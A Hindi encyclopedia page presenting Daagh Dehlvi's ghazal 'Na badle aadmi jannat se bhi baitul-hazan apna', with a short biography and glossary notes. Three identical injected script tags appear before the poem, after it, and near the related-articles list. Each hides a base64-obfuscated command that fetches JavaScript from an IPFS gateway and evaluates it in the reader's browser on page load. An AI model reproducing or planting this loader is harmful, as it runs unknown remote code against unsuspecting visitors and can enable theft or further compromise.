न बदले आदमी जन्नत से भी बैतुल-हज़न अपना -दाग़ देहलवी  

कवि दाग़ देहलवी
जन्म 25 मई, 1831
जन्म स्थान दिल्ली
मृत्यु 1905
मृत्यु स्थान हैदराबाद
मुख्य रचनाएँ 'गुलजारे दाग़', 'महताबे दाग़', 'आफ़ताबे दाग़', 'यादगारे दाग़', 'यादगारे दाग़- भाग-2'
इन्हें भी देखें कवि सूची, साहित्यकार सूची
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
दाग़ देहलवी की रचनाएँ

न बदले आदमी जन्नत से भी बैतुल-हज़न[१] अपना
कि अपना घर है अपना और है अपना वतन अपना।

    जो यूँ हो वस्ल तो मिट जाए सब रंजो-महन[२] अपना
    ज़बाँ अपनी दहन[३]उनका ज़बाँ उनकी दहन अपना।

न सीधी चाल चलते हैं न सीधी बात करते हैं
दिखाते हैं वो कमज़ोरों को तन कर बाँकपन अपना।

    अजब तासीर पैदा की है वस्फ़े-नोके-मिज़गाँ[४] ने
    कि जो सुनता है उसके दिल में चुभता है सुख़न अपना।

पयामे-वस्ल[५],क़ासिद[६] की ज़बानी और फिर उनसे
ये नादानी वो नाफ़हमी[७] ये था दीवानापन अपना।

    बचा रखना जुनूँ के हाथ से ऐ बेकसो, उसको
    जो है अब पैरहन[८] अपना वही होगा क़फ़न अपना।

निगाहे-ग़म्ज़ा[९] कोई छोड़ते हैं गुलशने दिल को
कहीं इन लूटने वालों से बचता है चमन अपना।

    यह मौका मिल गया अच्छा उसे तेशा[१०] लगाने का
    मुहब्बत में कहीं सर फोड़ता फिर कोहकन अपना।

जो तख़्ते-लाला-ओ-गुल के खिले वो देख लेते हैं
तो फ़रमाते हैं वो कि ‘दाग़’ का ये है ये चमन अपना

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. रहने की जगह
  2. पीड़ा
  3. मुँह
  4. विशिष्ट पलकों
  5. प्रणय-सन्देश
  6. सन्देशवाहक
  7. नासमझी
  8. वस्त्र
  9. दृष्टिपात
  10. कुल्हाड़ी

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

वर्णमाला क्रमानुसार लेख खोज

                              अं                                                                                                       क्ष    त्र    ज्ञ             श्र   अः

"https://amp.bharatdiscovery.org/w/index.php?title=न_बदले_आदमी_जन्नत_से_भी_बैतुल-हज़न_अपना_-दाग़_देहलवी&oldid=332441" से लिया गया